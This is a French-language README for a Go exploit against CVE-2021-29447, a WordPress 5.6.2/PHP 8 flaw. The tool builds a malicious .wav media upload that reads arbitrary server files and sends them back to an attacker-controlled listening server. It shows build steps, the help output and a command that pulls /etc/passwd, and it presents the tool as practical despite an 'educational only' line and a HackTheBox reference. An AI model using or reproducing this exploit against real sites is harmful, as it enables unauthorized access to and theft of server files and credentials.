
Exploit basé sur Go pour CVE-2021-29447 ciblant WordPress 5.6.2 avec PHP 8. Génère une charge utile .wav malveillante pour récupérer des fichiers arbitraires du serveur via le téléchargement de médias, nécessitant un accès de base wp-admin.
À des fins éducatives uniquement.
Cet exploit est censé être un outil vraiment pratique pour obtenir n'importe quel fichier d'un serveur exécutant WordPress 5.6.2 et php8. (voir https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5)
Tout ce dont vous avez besoin est un accès wp-admin de base et la capacité de télécharger un fichier média.
L'exploit générera une charge utile de fichier .wav à télécharger via wp-admin.
Ensuite, il utilise le serveur arrière de l'exploit pour vous donner le fichier directement sur votre console.
L'utilisation parfaite est la machine HackTheBox - metatwo https://www.hackthebox.com/machines/metatwo

$ go build
$ chmod +x exploit_cve-2021-29447
$ ./exploit_cve-2021-29447 --help
Usage of ./exploit_cve-2021-29447:
-local-server-ip string
Use local server ip where a local server will be set
-local-server-port int
Use local server port to run local server on
-o string
Output file to save exploit's result
-target-path string
Use target path to point on file you want to get from target server
$ ./exploit_cve-2021-29447 -local-server-ip=<your ip address> -target-path=/etc/passwd